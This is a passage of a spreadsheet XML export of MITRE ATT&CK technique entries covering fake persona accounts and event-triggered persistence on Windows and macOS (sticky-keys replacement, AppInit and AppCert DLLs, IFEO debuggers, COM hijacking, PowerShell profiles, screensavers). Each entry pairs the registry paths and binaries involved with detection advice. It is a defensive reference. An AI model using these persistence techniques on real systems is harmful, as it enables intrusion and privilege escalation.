    <t>Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as &lt;code&gt;mount&lt;/code&gt; (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>Containers, Linux, Windows</t>
  </si>
  <si>
    <t>Container: Container Creation, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; David Fiser, @anu4is, Trend Micro; Idan Frimark, Cisco; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Establish Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Establish Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. 
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>22 January 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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 </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Event Triggered Execution: Accessibility Features</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Paul Speulstra, AECOM Global Security Operations Center</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppCert DLLs</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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</si>
  <si>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T1546.010</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppInit DLLs</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt; value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/010</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values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
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) 
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Event Triggered Execution: Application Shimming</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)
Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/011</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Event Triggered Execution: Change Default File Association</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]\shell\[action]\command&lt;/code&gt;. For example: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, User</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Event Triggered Execution: Component Object Model Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t xml:space="preserve">There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  
Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. </t>
  </si>
  <si>
    <t>Elastic</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>Event Triggered Execution: Emond</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Ivan Sinyakov</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Event Triggered Execution: Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>Event Triggered Execution: LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Event Triggered Execution: Netsh Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/007</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>Event Triggered Execution: PowerShell Profile</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</t>
  </si>
  <si>
    <t>Allen DeRyke, ICE</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Event Triggered Execution: Screensaver</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Event Triggered Execution: Trap</t>
  </si>
  <si>
